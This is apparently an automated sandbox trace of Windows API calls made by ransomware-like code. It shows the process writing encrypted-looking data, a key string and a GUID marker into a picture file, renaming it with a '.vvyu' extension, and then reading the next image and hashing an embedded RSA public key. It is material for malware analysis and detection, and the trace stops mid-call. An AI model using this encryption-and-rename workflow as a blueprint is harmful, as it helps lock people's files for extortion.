[0199.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f6f0 [0199.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3200 [0199.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f738 [0199.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3218 [0199.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3248 [0199.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32a8 [0199.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3260 [0199.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.907] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0199.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32a8 [0199.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0199.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3260 [0199.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3248 [0199.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0199.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0199.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0199.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0199.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0199.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.910] GetCurrentThreadId () returned 0x66c [0199.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea7ae8 [0199.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0199.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.911] GetCurrentThreadId () returned 0x66c [0199.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0199.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32a8 [0199.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3248 [0199.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0199.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3260 [0199.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3230 [0199.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32c0 [0199.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0199.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3290 [0199.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3278 [0199.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32d8 [0199.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3278 [0199.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0199.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0199.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0199.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3248 [0199.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0199.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0199.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0199.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0199.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0199.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0199.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0199.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f738 | out: hHeap=0x620000) returned 1 [0199.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0199.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.926] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x12a27, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x12a27, lpOverlapped=0x0) returned 1 [0199.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0199.928] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x12a2c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.928] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.929] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.930] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.930] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.930] CloseHandle (hObject=0x510) returned 1 [0199.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0199.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0199.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0199.932] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\k_XON6PdpszzEOE.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\k_xon6pdpszzeoe.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\k_XON6PdpszzEOE.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\k_xon6pdpszzeoe.bmp.vvyu")) returned 1 [0199.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.934] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0199.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cc7070, ftCreationTime.dwHighDateTime=0x1d89f90, ftLastAccessTime.dwLowDateTime=0xfc7f6830, ftLastAccessTime.dwHighDateTime=0x1d8a10b, ftLastWriteTime.dwLowDateTime=0xfc7f6830, ftLastWriteTime.dwHighDateTime=0x1d8a10b, nFileSizeHigh=0x0, nFileSizeLow=0xbf0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LXhmd.gif", cAlternateFileName="")) returned 1 [0199.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e91710 [0199.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.937] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\LXhmd.gif") returned=".gif" [0199.938] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\LXhmd.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\lxhmd.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.938] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=48907) returned 1 [0199.938] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.941] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xbee5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.941] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.943] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.944] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xbf0b, lpOverlapped=0x0) returned 1 [0199.944] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.945] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.945] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.945] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0199.946] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.946] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.946] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.946] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, 